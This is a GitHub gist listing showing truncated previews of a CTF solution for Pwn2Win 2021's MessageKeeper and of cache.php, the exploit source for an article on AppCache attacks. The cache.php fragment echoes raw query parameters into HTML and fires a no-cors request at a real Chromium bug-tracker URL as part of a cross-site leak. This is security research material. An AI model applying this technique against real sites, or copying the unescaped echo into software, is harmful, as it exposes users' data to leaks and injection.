lbherrera
/ index.html
Created
May 30, 2021 16:39
Solution for the MessageKeeper challenge from Pwn2Win 2021
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE html> | |
| <html> | |
| <head> | |
| <title>Pwn2Win | MessageKeeper</title> | |
| </head> | |
| <body> | |
| <script> | |
| let alphabet = "0123456789abcdef"; | |
| const sleep = (ms) => { |
lbherrera
/ cache.php
Last active
June 5, 2021 03:36
Source code for the exploit used in the "AppCache's forgotten tales" article (https://blog.lbherrera.me/posts/appcache-forgotten-tales/).
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html manifest="manifest.php?patternA=<?php echo $_GET["patternA"]; ?>&patternB=<?php echo $_GET["patternB"]; ?>&prefix=<?php echo $_GET["prefix"]; ?>"> | |
| <body> | |
| <script> | |
| let patternA = new URL(location).searchParams.get("patternA"); | |
| let patternB = new URL(location).searchParams.get("patternB"); | |
| let prefix = new URL(location).searchParams.get("prefix") || ''; | |
| applicationCache.addEventListener("cached", () => { | |
| fetch("https://bugs.chromium.org/p/chromium/issues/entryafterlogin", { | |
| mode: "no-cors", |